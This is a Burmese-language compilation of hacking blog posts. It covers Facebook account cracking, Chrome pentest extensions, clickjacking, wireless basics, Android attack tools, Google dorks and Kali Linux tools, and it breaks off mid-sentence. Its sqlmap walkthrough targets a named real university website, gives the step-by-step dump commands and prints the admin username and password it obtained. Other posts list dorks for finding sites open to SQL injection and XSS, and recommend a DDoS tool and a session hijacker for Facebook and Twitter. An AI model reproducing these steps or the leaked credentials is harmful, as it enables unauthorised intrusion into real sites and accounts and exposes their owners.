ဒီတစ္ခါ Facebook Account တစ္ခုကို Crack လုပ္ဖို ့ျဖစ္ႏုိင္မလား မျဖစ္ႏုိင္ဘူးလား ဆိုတာကို ေလ့လာၾကည့္ၾကရေအာင္။

အရင္ဆံုး Hacking A Facebook Account နဲ ့ Cracking A Facebook Account ဆိုတာ မတူညီတဲ့ term ႏွစ္ခု ျဖစ္တယ္ဆိုတာကို သိထားဖို ့လိုအပ္ပါတယ္။

Hacking A Facebook Account ဆိုတာက foolproof methods ေတြျဖစ္တဲ့ Phishing တို ့ Keylogger တို ့စသည့္ နည္းလမ္းေပါင္းစံု ျဖင့္ account တစ္ခုကို ရယူျခင္းျဖစ္ပါတယ္.... ( မွတ္ခ်က္ ။ ။ အျခား methods ေတြအမ်ားၾကီး ရွိပါေသးတယ္ )

Cracking A Facebook Account ဆိုတာကေတာ့ Bruteforce Attack တို ့ Dictionary Attack တို ့ျဖင့္ password ကို crack လုပ္ျပီ account တစ္ခုကို ရယူျခင္းျဖစ္တယ္လို ့ အၾကမ္းဖ်င္းအားျဖင့္ ဆိုႏုိင္ပါတယ္။

Bruteforce Attack

Bruteforce Attack ဆိုတာကေတာ့ အေျခခံအက်ဆံုး cracking method တစ္ခုျဖစ္ပါတယ္။ Bruteforce Attack ဟာ ျဖစ္ႏုိင္ေျခရွိတဲ့ password combination ေတြကို correct password ရသည္အထိ  တုိက္ဆိုင္ စစ္ေဆးေပးတဲ့ method ျဖစ္ပါတယ္။  ဒါေပမယ့္ password က ရွုပ္ေထြးေလေလ correct password ရဖို ့ အခ်ိန္ပို ၾကာေလေလ ပါပဲ။

အဲ့ဒါနဲ ့ပတ္သတ္လို ့ ေအာက္က table ေလးကို ၾကည့္ၾကည့္ပါ။

Dictionary Attack

Bruteforce Attack နဲ ့ Dictionary Attack တို ့မွာ ကြာျခားခ်က္က တစ္ခုတည္းရွိပါတယ္။ အဲ့ဒါကေတာ့ Dictionary Attack မွာ မိမိစိတ္ၾကိဳက္ try ခ်င္တဲ့ password ကို try လုပ္ႏုိင္တဲ့ အခ်က္ပါပဲ။ နားရွဳပ္သြားလားမသိဘူး :D
Dictionary Attack မွာ wordlist ကို လြတ္လြတ္လပ္လပ္ စိတ္ၾကိဳက္ေရြးျခယ္ပိုင္ခြင့္ရွိပါတယ္။

ေအာက္မွာေဖာ္ျပထားတဲ့ Video Tutorial ကို ၾကည့္ျခင္းျဖင့္ Dictionary Attack ကို ပိုမို သေဘာေပါက္လိမ့္မယ္လို ့ထင္ပါတယ္။

Mozilla Firefox ဟာ Kali Linux မွာပါတဲ့ Default Browser ျဖစ္တဲ ့ Iceweasel နဲ ့ႏွိဳင္းယွဥ္ရင္ အသံုးျပဳရတာ User Friendly ျဖစ္မယ္လို ့က်ေနာ္ထင္ပါတယ္။ က်ေနာ္ကိုယ္တုိင္လည္း Iceweasel နဲ ့ယွဥ္ရင္ Firefox ကိုအသံုးျပဳရတာ ပိုႏွစ္သက္ပါတယ္။
ဒါေၾကာင့္ Kali Linux မွာ Mozilla Firefox အသံုးျပဳပံုကို share လုပ္ေပးသြားမွာျဖစ္ပါတယ္။

အဓိက အေရးၾကီးတာက မူလ Kali မွာပါတဲ့ Iceweasel ကို uninstall လုပ္ရမွာျဖစ္ပါတယ္။ မဟုတ္ရင္ သူက Firefox ကို install လုပ္ဖို ့allow ေပးမွာမဟုတ္ဘူးဗ်။

ဒါေၾကာင့္ အရင္ဆံုးအေနနဲ ့
၁။ terminal ဖြင့္ျပီးေတာ့  apt-get remove iceweasel
လို ့ရိုက္ထည့္ေပးလိုက္ပါ။ ဒါဆိုရင္ Iceweasel ကို remove လုပ္သြားမွာျဖစ္ပါတယ္။

၂။ ျပီးရင္ echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list > /dev/null လို ့ရိုက္ထည့္ျပီးေတာ့ install လုပ္ဖို ့အတြက္ repository ကို add လုပ္ရမွာျဖစ္ပါတယ္။

၃။ apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
ဆိုတာကေတာ့ လိုအပ္တဲ့ gpg key ကို import လုပ္ေပးမွာပါ။

၄။ လိုအပ္တဲ့ package ကို update လုပ္ဖို ့အတြက္ကေတာ့  apt-get update ဆိုတဲ့ command ကို အသံုးျပဳရပါမယ္။

၅။ Mozilla Firefox ကို install လုပ္ဖို ့အတြက္ကေတာ့ apt-get install firefox-mozilla-build လို ့ရိုက္ထည့္ရပါမယ္။

၆။ အဲ့ဒီ installation ျပီးသြားရင္ေတာ့ terminal ကေန firefox လို ့ရိုက္ထည့္ျပီး Mozilla Firefox ကို အသံုးျပဳႏုိင္ျပီျဖစ္ပါတယ္။

Pentesters သို ့မဟုတ္ Hacker အမ်ားစုဟာ သူတို ့အတြက္ အသံုး၀င္တဲ့ plugin ေတာ္ေတာ္မ်ားမ်ား အသံုးျပဳ လို ့ရတဲ့ Mozilla Firefox Browser ကို အသံုးျပဳၾကတာမ်ားပါတယ္။
ဒါက အရင္တုန္းကပါ အခုဆိုရင္ေတာ့ Chrome Browser မွာ Pentesters ေတြ အသံုး၀င္တဲ ့ extension ေတြ ေတာ္ေတာ္မ်ားမ်ားရွိေနပါျပီ။
အဲ့ဒီ အထဲကမွ အသံုး၀င္မယ္ ထင္တာေလးေတြနဲ ့မိတ္ဆက္ေပးခ်င္ပါတယ္။

XSS Rays

XSS Rays မွာ Scanner, Reverser နဲ ့ DOM inspection tool ေတြပါ၀င္ပါတယ္။

XSS Rays ရဲ ့ Official Description ထဲမွာ ေရးထားတာေတြကေတာ့

Official DescriptionXSS Rays is a security tool to help pen test large web sites. It's core features include a XSS scanner, XSS Reverser and object inspection. Need to know how a certain page filters output? Don't have the source? No problem. XSS Rays will blackbox reverse a XSS filter without needing the source code. 

Websecurify Scanner

Web application attacks ေတြေတာ္ေတာ္မ်ားမ်ားကို detect လုပ္ေပးႏိုင္တဲ့ scanner ျဖစ္ပါတယ္။ ျပီးေတာ့ fully automated ျဖစ္ျပီး user friendly ျဖစ္ပါတယ္။

အသံုးျပဳပံုအဆင့္ဆင့္
- websecurify scanner ကို ေအာက္က link ကေန download လုပ္လိုက္ပါ။
https://suite.websecurify.com/foundation 

- Scan ဖတ္ခ်င္တဲ့ URL ကို ရိုက္ထည့္လိုက္တာနဲ automatic scanning လုပ္သြားမွာျဖစ္ပါတယ္။

HTTP Finder

HTTP Finder ကေတာ့ Http Parameter Pollution attacks ကို အလြယ္တကူ detect လုပ္ႏိုင္ပါတယ္။ HTTP Parameter Pollution ဆိုတာ ေနာက္ဆံုးေပၚ web application attacks တစ္မ်ိဳးပဲျဖစ္ပါတယ္။

HTTP Finder ရဲ ့ Official Description ထဲမွာ ေရးထားတာေတြကေတာ့

HTTP Parameter Pollution (HPP) is a recently discovered web exploitation technique. Please read the NDSS 2010 paper for more details about the technique. HPP Finder is a Chrome extension designed for detecting HPP attempts. HPP Finder can detect URLs and HTML forms that might be susceptible of parameter pollution, but it is not a complete solution against HPP. 

XSS CHEF

XSS CHEF  ဆိုတာ google chrome အတြက္ BEEF (Browser Exploitation Framework) ကို အေကာင္းဆံုး replacement လုပ္ေပးႏုိင္ျပီးေတာ့ exploitation process ေတြကိုလည္း လြယ္ကူေစပါတယ္။

Cookie Editor

Cookie Editor ကလည္း Google Chrome မွာ Hacker ေတြအတြက္ အလြန္ အသံုး၀င္တဲ့ extension တစ္ခုပါပဲ။ အမ်ားအားျဖင့္ session hijacking attacks အတြက္ အသံုးျပဳၾကပါတယ္။
Session Hijacking နဲ ့ပတ္သတ္လို ့က်ေနာ္ introduction သေဘာမ်ိဳးေရးထားတဲ့ ပိုစ့္ရွိပါတယ္ မဖတ္ရေသးရင္ ဒီမွာ သြားဖတ္ႏိုင္ပါတယ္။

Clickjacking ဆိုတာ Attacker က Victim ကို သူ click လုပ္ခိုင္းခ်င္တဲ့ hidden လုပ္ထားတဲ့ link သို ့မဟုတ္ buttons ကို click လုပ္ေအာင္ cheat လုပ္တာပဲျဖစ္ပါတယ္။ ပံုမွန္အားျဖင့္ေတာ့ hidden link / buttons ေတြကို background အေရာင္နဲ ့ထပ္တူျဖစ္ေအာင္ဖန္တီးထားတတ္ၾကပါတယ္။
Clickjacking လုပ္ႏုိင္ဖို ့အတြက္လည္း web browser ေတြရဲ ့ security ပိုင္းအားနည္းခ်က္ကရွိေနပါတယ္။ အဲ့ဒါကေတာ့ web page ေတြကို မူလ general view ကေနတဆင့္ hidden layer ေတြ ကို allow လုပ္ထားလို ့ပါပဲ။
Clickjacking ဆိုတာကို ဥပမာအေနနဲ ့ ေအာက္က hidden layer ကို victim က မျမင္ရပါဘူး အေပၚက အုပ္ထားတဲ့ layer မွာက download button လိုမ်ိဳး ဒါမွမဟုတ္ play button လိုမ်ိဳး တစ္ခုခုကိုပဲ ျမင္ရပါမယ္။ တကယ္လို ့ victim က အဲ့ဒီ download/play button ကို ႏွိပ္လိုက္တဲ့အခါမွာ သူတကယ္ႏွိပ္မိတာက အဲ့ဒီ button ေတြေအာက္မွာ hidden လုပ္ထားတဲ့ layer မွာရွိတဲ့ Attacker ႏွိပ္ေစခ်င္တဲ့ button ကို အလိုလို ႏွိပ္ျပီးသား automatic ျဖစ္သြားျပီျဖစ္ပါတယ္။
အဲ့ဒီလုိနည္းနဲ ့ attacker တစ္ေယာက္ဟာ victim ကို သူ ႏွိပ္ေစခ်င္တဲ့ link/button ကို ႏွိပ္ခိုင္းသြားျခင္းကို Clickjacking လုပ္တယ္လို ့ေခၚပါတယ္။

ဒီတစ္ခါေတာ့ wireless network ရဲ ့ security ပိုင္းနဲ ့ပတ္သတ္ျပီး က်ေနာ္ တီးမိေခါက္မိ သေလာက္ေလး ကို share ေပးတဲ့သေဘာပါ။

Wireless Network ဆိုတာဘာလဲ ?

Wireless network ဆိုတာ devices ေတြတစ္ခုနဲ ့တစ္ခုကို wire ေတြ အသံုးမျပဳပဲ တစ္ခုနဲ ့တစ္ခု radio wave ကို အသံုးျပဳျပီး interconnection လုပ္တဲ့ network အမ်ိဳးအစားျဖစ္ပါတယ္။
computer ထဲမွာရွိတဲ့ wireless adaptor ကေနျပီးေတာ့data ေတြကို translate လုပ္ျပီး radio signal နဲ ့ transmit လုပ္လိုက္ပါတယ္။ အဲ့ဒီ signal ကို wireless router ကေန receive လုပ္ျပီး decode လုပ္ျခင္းျဖင့္ connect လုပ္ပါတယ္။
wireless network ကို အမ်ားအားျဖင့္ Wifi ဒါမွမဟုတ္ WLan လို သံုးႏွံဳးေခၚေ၀ၚၾကပါတယ္။
wireless network ရဲ ့အဓိကအားသာခ်က္ကေတာ့ user ေတြ အေနနဲ ့ network ကို connect လုပ္ဖို ့အတြက္ plug ထိုးစရာမလိုတာေၾကာင့္ အသံုးျပဳရတာ ပိုမို အဆင္ေျပပါတယ္။
သူ ့မွာလဲ အားနည္းခ်က္ရွိပါတယ္။ အဲ့ဒါကေတာ့ properly configured မလုပ္ထားရင္ security ပိုင္းမွာ wire နဲ ့ connect လုပ္တာထက္ ပိုျပီး security ပိုင္း အားနည္းပါတယ္။

Basic Terminology

Service Set Identifier (SSID) ဆိုတာ wireless networks ရဲ ့ alphanumeric string ေတြပါ။ သူက အမ်ားဆံုး 32 bit အထိရွိပါတယ္။ channel တစ္ခု သို ့မဟုတ္ range တစ္ခုအတြင္းမွာ network တစ္ခုထက္မက ရွိႏုိင္ပါတယ္။ SSID ဟာ network တစ္ခုနဲ ့တစ္ခု မတူညီၾကပါဘူး။







Wireless Access Point (WAP)


WAP ဆိုတာကေတာ့ wireless network signals ကို generated လုပ္တဲ့ point ကိုဆိုလိုတာပါ။
WAP ဆိုတာ network ထဲမွာရွိတဲ့ computer ကေန ထုတ္လႊင့္လိုက္တဲ့ radio signals ေတြကို receive လုပ္ေပးျပီး router ကို ပို ့ေပးတဲ့ အလုပ္ကို လုပ္ေဆာင္ပါတယ္။


Basic Service Set Identifier (BSSID)

WAP ဒါမွမဟုတ္ wireless router ရဲ ့ MAC address 48 bit key ျဖစ္ပါတယ္။

Beacons 

Beacons ဆိုတာ network ထဲမွာရွိတဲ့ computers ေတြနဲ ့WAP ၾကားမွာ connect လုပ္ေပးတဲ့ wireless packet ေတြပဲျဖစ္ပါတယ္။

Wireless Equivalent Privacy (WEP) ဆိုတာဘာလဲ ?

WEP ဆိုတာကေတာ့ wifi data stream ေတြကို encrypt လုပ္ထားျခင္းပဲျဖစ္ပါတယ္။ WEP encryption မွာ 64bit သို ့မဟုတ္ 128bit key ျဖစ္ပါတယ္။

WEP ရဲ ့အားသာခ်က္မ်ား

1. Authenticating Clients
users ဒါမွမဟုတ္ clients ဟာ network ကို access လုပ္ဖို ့အတြက္ မွန္ကန္တဲ့ WEP key ကို ရိုက္ထည့္မွ အသံုးျပဳႏုိင္မွာျဖစ္ပါတယ္။

2. Privacy 
wireless data ေတြကို encrypt လုပ္ျခင္းျဖင့္ user က မွန္ကန္တဲ့ WEP key ကို ရိုက္ထည့္တဲ့အခါက်မွ decryption ကို allow လုပ္မွာျဖစ္ပါတယ္။
WEP key ကို အလြယ္တကူ crack လုပ္လို ့ရႏုိင္ပါတယ္။ ဘာျဖစ္လို ့လဲဆိုေတာ့ Initialization Vector (IV) size က 24bit ဆိုေတာ့ အရမ္းတိုလြန္းတယ္။
ဒါေၾကာင့္မို ့လို ့ Wi-Fi Protected Access(WPA) နဲ ့ WPA2 ဆိုတဲ ့ security protocols ေတြကို ထပ္မံ released လုပ္လာၾကပါတယ္။

SQL Map ကို Python နဲ ့ develop လုပ္ထားျပီးေတာ့ Backtrack 5, Backtrack 5 R1 အပါအ၀င္ Backtrack Version အားလံုးမွာ ပါ၀င္တဲ့ အေကာင္းဆံုး SQL injection tool တစ္ခုပါ။ သူက database တစ္ခုလံုးကုိ takeover လုပ္လို ့ရတဲ့ powerful tool တစ္ခုလည္းျဖစ္ပါတယ္။



အရင္ဆံုး Vulnerable terget တစ္ခု လိုအပ္ပါတယ္ ။
(က်ေနာ္ကေတာ့ http://www.hu.edu.pk/viewfaculty.php?id=12 ဆိုတဲ့ Pakistan Site တစ္ခုနဲ ့ဥပမာေပးျပီး ရွင္းျပေပးသြားပါမယ္။)



Backtrack terminal ထဲကို သြားျပီးေတာ့  cd/pentest/database/sqlmap လို ့ရိုက္ထည့္လိုက္ပါ။



Sqlmap ကို run ဖို ့အတြက္ သံုးရမယ့္ command ေတြကေတာ့

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

(-u ဆိုတာက vulnerable url)

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

သို ့မဟုတ္

 ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db

တကယ္လို ့ --dbs လို ့အသံုးျပဳရင္ေတာ့ server ထဲမွာ ရွိတဲ့ database အားလံုးကို fetch လုပ္မွာျဖစ္ျပီး
-- current-db ဆိုရင္ေတာ့ current website နဲ ့ related ျဖစ္တဲ့ database ကိုပဲ fetch လုပ္မွာျဖစ္ပါတယ္။ ဒါဆိုရင္ database name ကို ရမွာျဖစ္ပါတယ္။

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results –tables

ဒီမွာ -D ဆိုတာကေတာ့ database name နဲ ့ - tables ဆိုတာကေတာ့ current database ထဲမွာ ရွိတဲ့ tables ေတြကို fetch လုပ္ဖို ့ျဖစ္ျပီးေတာ့ table name ကို ရမွာျဖစ္ပါတယ္။

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

ဒါကေတာ့ table ထဲမွာ ရွိတဲ ့columns name ေတြကို ရယူဖို ့အတြက္ျဖစ္ျပီး

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name –dump

ဒါဆိုရင္ေတာ့ "admin" ဆိုတဲ့ table ထဲမွာရွိတဲ့ information အားလံုးကို ရျပီဆိုရင္ေတာ့ process အားလံုးျပီးျပီဗ်။

Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123

လူေတာ္ေတာ္မ်ားမ်ား သိထားၾကတာက hacking တို ့ pentesting တို ့ကို computer ကေနပဲလုပ္လို ့ရတယ္လို ့ထင္ေနၾကတယ္ဗ်။ တကယ္တန္းေတာ့
Android ဖုန္းေတြနဲ ့လည္း pentesting လုပ္လို ့ရပါတယ္။ အဲ့လို attacking လုပ္ႏုိင္ဖို ့အတြက္ အသံုးျပဳတဲ့ android hacking tools ေတြ အမ်ားၾကီး ရွိပါတယ္။ အဲ့ဒီအထဲကမွ တကယ္အသံုး၀င္တဲ့ tools အခ်ိဳ ့ကို ေဖာ္ျပေပးသြားမွာျဖစ္ပါတယ္။

Android Network Toolkit

ေနာက္ဆံုးျပဳလုပ္ခဲ့တဲ့ Defcon Conference မွာ စတင္ျပီး release လုပ္ခဲ့တာျဖစ္ပါတယ္။ ဒီ toolkit ကို အသံုးျပဳျခင္းျဖင့္ penetration tester ေတြ Ethical Hackers ေတြ အေနနဲ ့ mobile device ေတြ အသံုးျပဳျပီးေတာ့ vulnerable  network ေတြကို ရွာေဖြဖို ့အသံုးျပဳႏုိင္ပါတယ္။ ဒီ application ကို ထုတ္လုပ္တဲ့ company ရဲ ့ေနာက္ကြယ္မွာ Israel Security Firm တစ္ခုျဖစ္တဲ့ Zimperium ပါ၀င္ေနတယ္လို ့သိရပါတယ္။

Download Android Network Toolkit

Nmap for Android

Nmap (Network Mapper) ဟာ Network Scanner (Port Finder)Tools  ေတြထဲမွာ အေကာင္းတကာ့အေကာင္းဆံုး tool တစ္ခုပဲျဖစ္ပါတယ္။ Nmap ဟာ Unix OS အတြက္ အဓိကထားျပီး ထုတ္လုပ္ခဲ့ေသာ္လည္း အခုဆိုရင္ေတာ့ Windows OS အတြက္သာမက Android OS အတြက္ပါ ထုတ္လုပ္လာခဲ့ပါတယ္။ Nmap ကို အသံုးျပဳျပီး scan လုပ္လို ့ျပီးတာနဲ ့scan result ကို email ကတဆင့္ လက္ခံရရွိမွာျဖစ္ပါတယ္။

Download Nmap for Android

FaceNiff 2.4 - Session Hijacker for Android

FaceNiff ကေတာ့ Social Networking Site ေတြျဖစ္တဲ့ Facebook တို ့Twitter တို ့ကို session hijacking လုပ္ဖို ့အတြက္ရည္ရြယ္ပါတယ္။

(Note: က်ေနာ္ ကိုယ္တိုင္ တစ္ခါမွ အသံုးမျပဳဖူးပါ။)

Download FaceNiff 2.4

AnDOSid - Ddos tool for Android

Ddos Attack ဟာ အရမ္းေၾကာက္ဖို ့ေကာင္းပါတယ္ ဘာျဖစ္လို ့လဲဆိုေတာ့ အဲ့ဒီ attack ဟာ hacking ပိုင္းမွာ သိပ္ကြ်မ္းက်င္စရာမလိုဘူး တကယ္တိုက္ရင္ တကယ္ထိေရာက္ျပီး Server တစ္ခု Down သြားႏုိင္ပါတယ္။ AnDOSid ဆိုတဲ့ tool ကေတာ့ က်ေနာ္သံုးဖူးသမွ်ထဲမွာ Android Device ေတြအတြက္ အေကာင္းဆံုး Ddos tool ပဲျဖစ္ပါတယ္။

Download AnDOSid

SSHDroid - Android Secure Shell

Secure Shell လုိ ့ေခၚတဲ့ SSH အသံုးျပဳျခင္းျဖင့္ သင့္ Device ကို PC နဲ ့connect လုပ္တဲ့ အခါမွာ execute command ေတြျဖစ္တဲ့ terminal တို ့ adb shell တို ့ကို အသံုးျပဳႏုိင္မွာျဖစ္ပါတယ္။

Download SSHDroid

Attacker ေတာ္ေတာ္မ်ားမ်ားကေတာ့ Google Search ကို အသံုးျပဳျပီးေတာ့ vulnerable ျဖစ္ေနတဲ့ website ကို ရွာေဖြၾကပါတယ္။ တစ္ခ်ိဳ ့ေတြကေတာ့ရၾကျပီး တစ္ခ်ိဳ ့ကေတာ့ မေအာင္ျမင္ပါဘူး။
Website တစ္ခု vulnerable ျဖစ္မျဖစ္ကို စစ္ဖို ့ဆိုတာကေတာ့ Newbie ေတြအတြက္ေတာ့ အခက္အခဲျဖစ္ေနမွာပါ။ ဒါဆိုရင္ Google Dorks ေတြသံုးျပီးေတာ့ vulnerable site ကိုရွာေဖြတာ အေကာင္းဆံုးနည္းလမ္းပါပဲ။

vulnerable site ကို ရွာေဖြဖို ့ Dorks ေတြ အမ်ားၾကီးရွိပါတယ္။ ဒီေနရာမွာစဥ္းစား စရာ တစ္ခ်က္က ဒီ Dorks ေတြကို လူေတာ္ေတာ္မ်ားမ်ားက အသံုးျပဳျပီး attack လုပ္သြားျပီးျပီ ဆိုတာကို ေမ့ထားလို ့မရပါဘူး။
ဒါ့ေၾကာင့္ ဦးေႏွာက္ နည္းနည္း သံုးျပီး အျခား technique ေတြကိုလည္း စဥ္းစားအသံုးခ်ရပါမယ္။

က်ေနာ္သည္ Attacker တစ္ေယာက္မဟုတ္ပါဘူး။ ဒါေပမယ့္ က်ေနာ္ သိသေလာက္ Dorks ေတြကို ေဖာ္ျပေပးသြားမွာျဖစ္ပါတယ္။ ဒီထက္ေကာင္းျပီး ပိုမိုလြယ္ကူတဲ့ Dorks ေတြလည္း ရွိေကာင္းရွိမွာပါ။

Dorks for Cross Site Scripting XSS

inurl:".php?search="

inurl:".php?searchstring="

inurl:search.php?q=

inurl:com_feedpostold/feedpost.php?url=

inurl:/poll/default.asp?catid=

inurl:/search_results.php?search=

inurl:scrapbook.php?id=

inurl:headersearch.php?sid=

Dorks for SQL Injection (SQLI)

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: require()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()

How to check Sub-Domain

Sub-domain ကို ရွာေဖြဖို ့အတြက္ အေကာင္းဆံုး Dorks ေတြကေတာ့

Site: URL -inurl:www

ဆိုတာကို သံုးသင့္ပါတယ္။ ဥပမာ google ရဲ ့Sub-domain ကိုရွာခ်င္တယ္ဆိုရင္ေတာ့

Site: google.com -inurl:www

လို ့အသံုးျပဳရပါမယ္။

ဒီတစ္ခါထြက္ရွိလာတဲ့ Kali Linux 1.0.4 မွာေတာ့အရင္ version အေဟာင္းနဲ ့ၾကည့္ရင္ေတာ္ေတာ္ ေလး ေျပာင္းလဲထားတာေတြ ့ရပါတယ္။

သူ ့မွာ ထပ္ျဖည့္ထားတဲ့ additional tools ေတြကေတာ့

• Winexe
• Pass the Hash Toolkit
• enum4linux
• RegRipper
• rfcat
• Unicornsan
• jSQL
• JD-GUI
• Ubertooth
• Ghost Phisher
• Uniscan
• Arachni
• Bully 

ဒါအျပင္ package ေတြေတာ္ေတာ္မ်ားမ်ားလဲ upgrade လုပ္ထားပါေသးတယ္။

အဲ့ထဲက upgrade လုပ္ထားတဲ့ package အခ်ိဳ ့ကေတာ့